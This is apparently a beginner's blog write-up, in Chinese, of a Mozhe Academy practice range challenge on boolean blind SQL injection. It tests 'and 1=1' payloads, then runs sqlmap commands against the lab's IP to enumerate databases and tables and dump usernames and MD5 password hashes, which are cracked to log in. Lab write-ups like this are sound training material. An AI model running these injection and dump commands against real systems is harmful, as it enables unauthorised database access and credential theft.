墨者学院的靶场之SQL注入漏洞测试(布尔盲注)

这是我作为小白第一次成功的把key找出来了,分享一下

墨者学院的靶场SQL注入漏洞测试(布尔盲注)
墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第1张图片

IP地址 : 219.153.49.228
端口 : 40205
协议 : http
首先我输入了IP地址和端口号
墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第2张图片
看到这个后,我按了F12看了后台的代码,看完之后猜测http://219.153.49.228:40205/new_list.php?id=1可进行注入,然后直接加’或and 1=1和and1=2看页面是否发生变化,可以看出是否有注入。

输入http://219.153.49.228:40205/new_list.php?id=1 and 1=1
接着输入http://219.153.49.228:40205/new_list.php?id=1 and 1=2,页面发生变化了,由此可以知道有注入点。

接下来打开sqlmap ,用sqlmap扫一下,输入sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 --dbs 获取到5个数据库,刚开始猜测是test数据库,进行之后发现是错误的。然后就猜测是stormgroup数据库
墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第3张图片接下来是获取数据库中的表,输入sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 -D stormgroup --tables 获取到的表是member和notice
墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第4张图片这里已经获取了数据库和表了,接下来是想办法获取它的列,所以输入sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 -D stormgroup -T member --columns 获取到的列名分别是 name password status
墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第5张图片接下来就是想办法把name和password查找出来,所以输入:sqlmap.py -u http://219.153.49.228:40205/new_list.php?id=1 -D stormgroup -T member -C name,password --dump 得到的两个用户名都是mozhe,两个密码分别是这两个,然后进行md5解密。
墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第6张图片
解密得到的密码分别是
528469
900904
输入之后登陆成功,然后获取key墨者学院的靶场之SQL注入漏洞测试(布尔盲注)_第7张图片

你可能感兴趣的:(墨者学院的靶场,mysql,sql)